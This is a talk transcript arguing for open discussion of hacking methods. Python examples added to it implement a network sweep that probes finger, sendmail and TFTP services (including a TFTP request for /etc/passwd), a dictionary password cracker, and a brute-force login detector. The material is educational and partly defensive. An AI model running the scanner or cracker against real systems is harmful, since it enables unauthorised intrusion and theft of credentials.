Are we sitting comfortably?
Then I shall begin.
A few months ago, I was watching some consumer-information type programme on TV - Here And Now, Watchdog - something like that.
The main item on the programme was an exposé on confidence trickery - specifically on the hundreds of cases of old-age pensioners (senior citizens, crumblies - call them what you will) who were being approached in their homes by thugs who would demand money from them for work that had never been solicited, or on behalf of the local council, or gas board or water board, and so on...
I was shocked. Appalled. Aghast, even.
How could the BBC be so utterly irresponsible, I wondered?
How could their programme editor be so completely thoughtless as to air a programme like this, which would certainly plant the idea of similar shenanigans in the minds of Britain's youth?
Thousands, perhaps millions of adolescents with a desire to make fast cash might have seen that programme and then gone out and done the same for themselves, preying on the weaknesses of our most vulnerable members of society.
[START RANTING]
From this premise, it seems obvious to me that we need much tighter control on the media, to prevent further instances of this occurring - where today's youth will be corrupted by ideas fed to them through mainstream communications media and thereby turn against society, with increasing crime rates and greater costs for law enforcement, causing higher taxes...
[DRAMATIC PAUSE]
Of course, this is all bullshit.
Yes, it's true that I saw such a programme, and yes, I was shocked.
However, what I was shocked by was that it was occurring - even that this sort of crime could occur at all. Through my own naivety, perhaps, I hadn't thought of this as a possible problem which could impact people I know and love.
The concept had never crossed my peaceful and generally law-abiding nice-guy-if-a-bit-daft mind. Now that I felt informed about the situation, at least to some extent, I could take at least some steps to try to ensure that the problem was unlikely to occur amongst my circle of relatives.
However... on the other hand, the sort of kneejerk reactions that I tried to outline, earlier, are all too common in the communications industries.
For those of you who've witnessed them, think back to arguments you've seen regarding topics like encryption, network auditing tools, host auditing tools, www software like Java or Netscape cookies (an interesting topic in itself) - double-edged software which can equally be put to good, bad, or stupid (naive) use - and usually all of the debates will include at least a few hype-driven threads along the lines of:
As you may have guessed from my take on the issue, I believe that in many such situations there is generally a greater benefit in informing the populace in some constructive manner than there is in promoting ignorance and locking it down via authoritarian controls.
Such is the way of debate over Internet security vulnerabilities; I have almost given up reading newspapers and trade-rags due to the high proportion of quite ludicrous fantasy that one encounters nowadays, especially when (from the vantage point of experience) it is easy to see when a story has been shoehorned into the press to fit someone's political or commercial agenda.
So, it is in an attempt to redress the media's swamping of the press with stories of elite hacqerz ("some as young as 12 years old!") with arcane skills which defy mortal imagination, I have prepared this little one-day programming course in "How to Build a Hacking Toolkit".
At the end of it, I hope you'll agree that many of the basic skills of hacking are quite as easy as knocking on doors and browbeating little old ladies out of their pension money.
For those of you who may suffer wit-impairment of some form, please note that I do not condone either of the activities of extorting money from the elderly, nor of hacking into other people's machines - but I do feel strongly that there is an overall benefit in shining a light on hacking methods.
Before I begin, though, I suppose that I had better say a thing or two about plumbing.
I won't pretend that everyone in this room has been exposed to computer programming in general or to operating systems like Unix in particular, so instead of just whipping slides of programs on and off the OHP without any of the magic sinking in, I thought that I'd best explain what's going on.
Consider a plumbing system - a source of waste water which then passes through a variety of pipes and appliances on its way to the sewage outlet.
First the water passes into the sink, drains into the sewer, then reaches a filtration plant which processes it in a variety of ways:
The point to emphasise here is the modularity of the process; a well defined flow of "stuff" starts in one place and is piped through a variety of processes which do something useful, before the "stuff" is finally dumped.
Similarly perhaps to a network auditing (or, if you prefer, network breaking) program:
Where you start with a list of computers (or "hosts") which are attached to the network.
Again, the "stuff" is piped through a variety of processes - of removing unnecessary information, of checking that we are able to reach each host that is listed. Then, the list is passed through an "attack engine" which processes it in a variety of ways:
Finally, the files that are created may be examined either automatically or by a human, looking for keys - indications of weakness - which have been detected by the attack engine, and which may be collated to make a list of weak machines.
I hope that doesn't look too technical for people to follow. 8-)
What I've outlined is basically a strategy - a fairly commonsense strategy at that - for detecting machines that are attached to a network and which suffer weak security.
What surprises most people is how easily this strategy can be converted into a working tool that matches the expectations of this design.
To illustrate this, I have written ITOD - a network breaking tool written with five aims in mind. ITOD is meant to:
[HOSTS]
    # loopback
    127.0.0.1   localhost
    # servers
    10.1.1.1    crypto loghost
    10.1.1.2    foo
    10.1.1.3    bar
    10.1.1.4    baz
    10.1.1.5    wibble
    10.1.1.9    thud thud-slip
    # cartoon cluster
    10.1.2.9    bugs
    10.1.2.11   daffy
    10.1.2.12   taz
    10.1.2.14   elmer
    10.1.2.15   porky
    10.1.2.16   droopy2
    10.1.2.18   speedy
Here we have a plausible looking list of 14 machines that are attached to a network - such information must be generally available in order for computers to communicate with each other, and here we see a list of network addresses, each with one or more names - hostnames - attached.
Working from this, we can immediately cast an impression of what our overall tool should look like, and (by using a couple of utilities that are standard with the Unix operating system) - we can even start implementing some of it:
...don't be put off at first glance; this is the code for our hacking program in its entirety. One page of text. The first half of the program can be safely ignored when gaining a rough understanding of the program: [COVER TOP SECTION] - being as it merely deals with setting up a few bits of data that we'll need later, but don't have to bother with now.
This leaves 8 lines of code.
The first section merely sets up a directory - a folder - a repository in which we shall store the information that we glean:
Having thus implemented the general concept of the tool - how the data flows through it, and what tasks each of the modules of the tool should perform - we're now stuck with the matter of following through this outermost shell of design by implementing the modules themselves.
The first module - called itod-ping
- is trivial to analyse and its contents will be familiar to anyone with a basic knowledge of Unix; if you're not familiar, the logic is simple and follows a commonsense approach to the module's specification:
Now - before going on - I must agree that yes, to some people (perhaps journalists especially) all this looks mystical or incomprehensible, and that therefore we should venerate people capable of writing it - but I must assure you that it's not magical in any way.
The software that you see here would have run mostly unchanged on any unix computer of 10, perhaps 15 years ago, and the language that these programs are written in dates back to 1970.
This is all college-level stuff, and is no more magical than Pitman's shorthand.
Returning to our flowchart, the remaining addresses of "live" machines on the net are passed downstream to:
The hacking engine - itod-engine - the sewage plant of our analogy, which is the last remaining bit of any complexity. Similar to the previous program, this module -
So now we have the complete picture - stuff (a list of hostnames) is stripped of non-essential information and fed into one program (which filters out dead machines) and is further fed into another program, which launches an army of weenie little attacker programs against the host, gathering information, which is then stored in files indexed by the address of the machine.
We have not yet addressed the question of "What are these attacks?" - but I should like to defer that question for awhile, and to ask the audience to think like criminals for a moment.
Imagine that you too want to cheat OAPs out of their pension. If you were intent on this crime, how would you approach it?
[ITOD-FINGER] - gathers a list of people connected to $host
[ITOD-RSH] - tries to log in as half a dozen standard usernames.
[ITOD-TFTP] - tries to retrieve the system password file - this should be impossible but for human error, but then again, if human error occurs, given a large enough sample, you're bound to be successful eventually
[ITOD-SENDMAIL] - logs the version number of the mail daemon [EXPLAIN] (notorious for bugs) and also whether a human being actually bothers to monitor e-mail sent to the system administrator.
- and so forth. The parallels are very close, and I leave it up to you to discover more, if you're interested.
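The whole pipeline described above - hosts list, strip the noise, drop dead machines, run the probes, file the results by address - as an added example written for this page in Python. It is not the ITOD shell code from the slides (which is not reproduced on this page); the function names, the TCP-connect liveness test standing in for ping, the result-file layout and the sample hosts text are all this example's own assumptions. The finger, sendmail and tftp probes correspond to the [ITOD-FINGER], [ITOD-SENDMAIL] and [ITOD-TFTP] modules listed above; the TFTP one builds the actual read-request packet so you can see how little the "attack" amounts to.

```python
"""Added example: an ITOD-shaped sweep in Python (not the original shell code).
Stages, as in the talk: hosts list -> strip comments and noise -> keep live
hosts -> run probes -> one result file per address.  Function names, the
TCP-connect liveness test (in place of ping) and the result-file layout are
this example's own assumptions.
"""
import os
import socket

# Constructed input in /etc/hosts form, mirroring the list shown in the talk.
SAMPLE_HOSTS = """\
# loopback
127.0.0.1 localhost
# servers
10.1.1.1 crypto loghost
10.1.1.2 foo

10.1.2.9 bugs   # cartoon cluster
"""

def parse_hosts(text):
    """Return [(address, [names]), ...]; comments, blank lines and loopback
    entries are dropped (the 'remove unnecessary information' stage)."""
    hosts = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        addr, *names = line.split()
        if addr.startswith("127."):
            continue
        hosts.append((addr, names))
    return hosts

def tcp_alive(addr, ports=(22, 25, 79), timeout=1.0):
    """Liveness by TCP connect to a few common ports (stands in for ping)."""
    for port in ports:
        try:
            with socket.create_connection((addr, port), timeout=timeout):
                return True
        except OSError:
            continue
    return False

def banner(addr, port, send=b"", timeout=2.0):
    """Connect, optionally send a request, and return the first reply bytes."""
    with socket.create_connection((addr, port), timeout=timeout) as s:
        if send:
            s.sendall(send)
        return s.recv(1024)

def probe_finger(addr):
    # RFC 1288: an empty query line asks for the list of logged-in users.
    return banner(addr, 79, b"\r\n")

def probe_sendmail(addr):
    # The SMTP greeting usually names the daemon and its version.
    return banner(addr, 25)

def tftp_rrq(filename, mode="octet"):
    """Build a TFTP read request (RFC 1350): opcode 1, filename, mode."""
    return b"\x00\x01" + filename.encode() + b"\x00" + mode.encode() + b"\x00"

def tftp_reply_kind(packet):
    """Classify a TFTP reply by opcode: 3 = DATA (file served), 5 = ERROR."""
    if len(packet) < 4:
        return "short"
    return {3: "data", 5: "error"}.get(int.from_bytes(packet[:2], "big"), "other")

def probe_tftp(addr, filename="/etc/passwd", timeout=2.0):
    # Ask an unauthenticated TFTP server for the password file; a DATA
    # reply means the misconfiguration the talk describes is present.
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(tftp_rrq(filename), (addr, 69))
        reply, _ = s.recvfrom(600)
    return tftp_reply_kind(reply).encode() + b" " + reply[:64]

PROBES = {"finger": probe_finger, "sendmail": probe_sendmail, "tftp": probe_tftp}

def run_itod(hosts_text, outdir, alive=tcp_alive, probes=PROBES):
    """Run every probe against every live host, filing results by address.
    Returns {address: {probe: result}} so a later stage can collate hits."""
    os.makedirs(outdir, exist_ok=True)
    results = {}
    for addr, _names in parse_hosts(hosts_text):
        if not alive(addr):
            continue
        results[addr] = {}
        for name, probe in probes.items():
            try:
                out = probe(addr)
            except OSError as exc:  # refused, timed out, unreachable: record it anyway
                out = f"ERR {exc}".encode()
            results[addr][name] = out
        with open(os.path.join(outdir, addr), "wb") as fh:
            for name, out in results[addr].items():
                fh.write(name.encode() + b": " + out + b"\n")
    return results

if __name__ == "__main__":
    import tempfile
    print(run_itod(SAMPLE_HOSTS, tempfile.mkdtemp()))
```

Note that a probe which fails is recorded rather than dropped: "connection refused" on port 69 is itself a finding (no tftp daemon), and a timeout distinguishes a filtered host from a refusing one. The `alive` and `probes` parameters exist so the stages can be swapped, which is also what lets the pipeline be exercised without a network.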
The matter is worsened by the fact that computers are extremely dumb. Senile, even. Most vendors do not bother to write software which will detect that a hundred people have been knocking on the door with false identities in an attempt to get in - successfully or otherwise. That sort of thing is hard, and moreover has its own faults.
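The door-rattling detector that the talk says most vendors did not ship, as an added Python example written for this page (it is not taken from any product). The log lines are constructed in an assumed generic "FAILED/ACCEPTED LOGIN FROM ... FOR ..." format; only the parser is tied to that format. It also shows the "has its own faults" point: a plain failure count alerts on one legitimate user fumbling their own password, so the rule additionally requires several different usernames from the same source.

```python
"""Added example: spotting many login attempts with different names from one
source.  Written for this page; the log format below is assumed, not any
real daemon's wording, and the sample lines are constructed.
"""
import re
import time
from collections import defaultdict

SAMPLE_LOG = """\
Mar  1 02:10:01 foo login[211]: FAILED LOGIN FROM 10.1.2.9 FOR root
Mar  1 02:10:02 foo login[212]: FAILED LOGIN FROM 10.1.2.9 FOR bin
Mar  1 02:10:03 foo login[213]: FAILED LOGIN FROM 10.1.2.9 FOR daemon
Mar  1 02:10:04 foo login[214]: FAILED LOGIN FROM 10.1.2.9 FOR sync
Mar  1 02:10:05 foo login[215]: FAILED LOGIN FROM 10.1.2.9 FOR guest
Mar  1 02:10:06 foo login[216]: ACCEPTED LOGIN FROM 10.1.2.9 FOR guest
Mar  1 02:11:30 foo login[230]: FAILED LOGIN FROM 10.1.1.2 FOR alice
Mar  1 02:11:41 foo login[231]: FAILED LOGIN FROM 10.1.1.2 FOR alice
Mar  1 02:11:55 foo login[232]: FAILED LOGIN FROM 10.1.1.2 FOR alice
Mar  1 02:12:02 foo login[233]: ACCEPTED LOGIN FROM 10.1.1.2 FOR alice
Mar  1 02:30:00 foo login[240]: FAILED LOGIN FROM 10.1.1.3 FOR bob
"""

LINE = re.compile(r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ \S+: "
                  r"(?P<status>FAILED|ACCEPTED) LOGIN FROM (?P<src>\S+) FOR (?P<user>\S+)$")

def parse(log):
    """Return sorted (seconds, src, user, accepted) tuples; other lines ignored."""
    events = []
    for line in log.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        tm = time.strptime(" ".join(m["ts"].split()), "%b %d %H:%M:%S")
        secs = tm.tm_yday * 86400 + tm.tm_hour * 3600 + tm.tm_min * 60 + tm.tm_sec
        events.append((secs, m["src"], m["user"], m["status"] == "ACCEPTED"))
    return sorted(events)

def find_knockers(events, threshold=5, distinct_users=3, window=60):
    """Alert on a source with >= threshold failures against >= distinct_users
    names inside `window` seconds.  One person mistyping their own password
    fails the distinct-names test, which keeps that false positive out.
    success_after records whether a login from that source was then accepted:
    the knocker found an open door."""
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev[1]].append(ev)
    alerts = []
    for src, evs in by_src.items():
        fails = [ev for ev in evs if not ev[3]]
        lo = 0
        for hi in range(len(fails)):          # sliding window over failures
            while fails[hi][0] - fails[lo][0] > window:
                lo += 1
            burst = fails[lo:hi + 1]
            names = {ev[2] for ev in burst}
            if len(burst) >= threshold and len(names) >= distinct_users:
                last = burst[-1][0]
                alerts.append({"src": src, "failures": len(burst), "users": len(names),
                               "success_after": any(ev[3] and ev[0] >= last for ev in evs)})
                break                          # one alert per source
    return alerts

if __name__ == "__main__":
    for alert in find_knockers(parse(SAMPLE_LOG)):
        print(alert)
```

With the defaults only 10.1.2.9 is reported, and its accepted "guest" login after the burst is flagged; 10.1.1.2 never qualifies, even at a threshold of 3, because every failure there is for the same user.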
However, perhaps the most interesting thing about most of these attacks is that they are exemplified by unauthorised use of legitimate computer network services. Just as telephones can be used to make both 999/911 and nuisance phone calls, most of the services that provide information to legitimate users of a computer can be subverted in "bad" ways.
The "finger" program tells you if your friends/colleagues are logged in. It could also tell hackers what usernames/passwords to attack.
The "rsh" or "telnet" programs allow users to log into your computer remotely. If someone can spoof their identity adequately to fool the target's software - and this is trivial to do - then they can be used to subvert your machine.
Your web browser stores your e-mail address for use when composing e-mail. It could also pass that e-mail address to a marketing company to send you junk e-mail advertising, targeted around the products you were browsing.
The FTP program is the standard way of moving files around the internet. If misconfigured, it could provide information that would let someone break into your system. If a hacker tries long enough, he will eventually discover a misconfigured system.
And finally, I suppose, if all the other basic misconfigurations fail, you could always try the Ali-Baba approach and try to guess someone else's password, using another technique which is less terrifying in retrospect - password guessing.
The basic technique is simple; get a dictionary that contains a few hundred thousand words, and then - for each word - see whether any of the users on the system used the word as their password. It's so simple, it's dumb.
Moreover, it can be implemented with a small program:
I make no apologies for this one slide - it's purposely condensed.
This is, to my knowledge, the world's smallest fully-functional password cracking program, and I speak with some authority on this matter, being also the author of the world's largest password cracking program.
For the fun of it, I spent a lot of effort into squeezing an entire password cracker into as few characters as possible, and the best effort I've made so far is a slightly condensed version of this one, and is only 72 characters long. Accurate typists could have it typed in and running from scratch in under 10 seconds.
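The dictionary attack just described, as an added Python example written for this page; it is neither the 72-character cracker the talk refers to (which is not reproduced here) nor Crack. Because the `crypt` module is gone from recent Python releases, the password file here uses an assumed stand-in hash (PBKDF2-HMAC-SHA256 keyed on the user's salt) in a `user:salt$hash` format of this example's own; the users, salts, passwords and word list are constructed. Beyond the one-line idea, it shows the trick that makes a real cracker fast: a candidate word is hashed once per distinct salt, not once per user.

```python
"""Added example: dictionary password guessing in Python, written for this
page (not the talk's condensed cracker, not Crack).
Assumed stand-in for crypt(3): PBKDF2-HMAC-SHA256(word, salt), hex-encoded.
File format is user:salt$hash, one entry per line; all users, salts and
passwords below are constructed.
"""
import hashlib
from collections import defaultdict

ROUNDS = 1000  # parameter of the stand-in hash; fixed here, real KDFs store it

def hash_password(word, salt):
    return hashlib.pbkdf2_hmac("sha256", word.encode(), salt.encode(), ROUNDS).hex()

def parse_passwd(text):
    """user:salt$hash lines -> {user: (salt, hash)}; comments and blanks skipped."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, field = line.split(":")[:2]
        salt, digest = field.split("$", 1)
        entries[user] = (salt, digest)
    return entries

def crack(entries, words):
    """Hash each candidate once per distinct salt and compare it with every
    user on that salt.  Returns ({user: password}, hashes computed); the
    second value is what the salt grouping saves over hashing per user."""
    by_salt = defaultdict(dict)  # salt -> {digest: [users]}
    for user, (salt, digest) in entries.items():
        by_salt[salt].setdefault(digest, []).append(user)
    found, calls = {}, 0
    for word in words:
        for salt, digests in by_salt.items():
            calls += 1
            for user in digests.get(hash_password(word, salt), ()):
                found[user] = word
    return found, calls

def make_sample():
    """Constructed password file: three users share a salt, one does not."""
    plain = {"alice": ("ab", "wibble"), "bob": ("ab", "password"),
             "dave": ("ab", "letmein"), "carol": ("zz", "c0rrect-H0rse!!")}
    return "\n".join(f"{u}:{s}${hash_password(p, s)}" for u, (s, p) in plain.items())

WORDLIST = ["secret", "password", "wibble", "letmein", "daffy"]  # constructed

if __name__ == "__main__":
    hits, n = crack(parse_passwd(make_sample()), WORDLIST)
    print(hits, "after", n, "hash computations")
```

Five words against four users costs ten hash computations here rather than twenty, because three of the users share a salt; with the twelve-bit salt of classic crypt(3) and a few thousand users the saving is what turns an overnight run into minutes. Carol's password never appears in the list, which is the whole defence against this technique.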
If size is a measurement of simplicity, and if the concepts can be described in such a "it's so obvious" commonsense manner, well, then looking not merely at this tiny password cracking program, but at this whole ITOD network-breaking suite (the 85 lines of code that I have shown you today) - software which is quite capable of sweeping a medium sized network and finding pointers to several holes....
...it just seems so ridiculous that some people think that they can prevent self-motivated others from working this sort of stuff out for themselves, and that we should avoid discussion of security problems for fear of encouraging others into the paths of naughtiness.
Of course, I dare not add a postscript to this presentation; certainly there are security holes out there, the causes of which are far from obvious to ordinary mortals, and there are bugs which rely upon subtle manipulation of arcane computer programs with microsecond accuracy...
but, in my experience, they're not the worst of it, and so long as their causes are discussed openly, and so long as they get fixed eventually, I don't worry about them.
The worst comes from human error on a small scale, being gathered together in extreme density and with global accessibility - and unfortunately that's precisely what the internet was designed to do.
So, where does this leave us, after this little lesson?
Certainly I hope that those of you who were worried about this terrifying threat of "hackers" with "arcane knowledge" now feel that it is a little less distant; those who are systems administrators may wish to re-examine their networks and implement something similar to what you've seen here, today, and go check your own systems.
Anyone here who thinks that the Internet is controllable - indeed, that people on the Internet are controllable - I hope that I've illuminated your minds a little. "Hacking" need be little more than knocking on doors and rattling doorknobs, until you find one that's open. I recommend that you switch your affections from control to accountability, which is a far more likely proposition - even with the proviso that digital data is infinitely fungible and (often) easily forged.
Thank you very much [etc]. Are there any questions?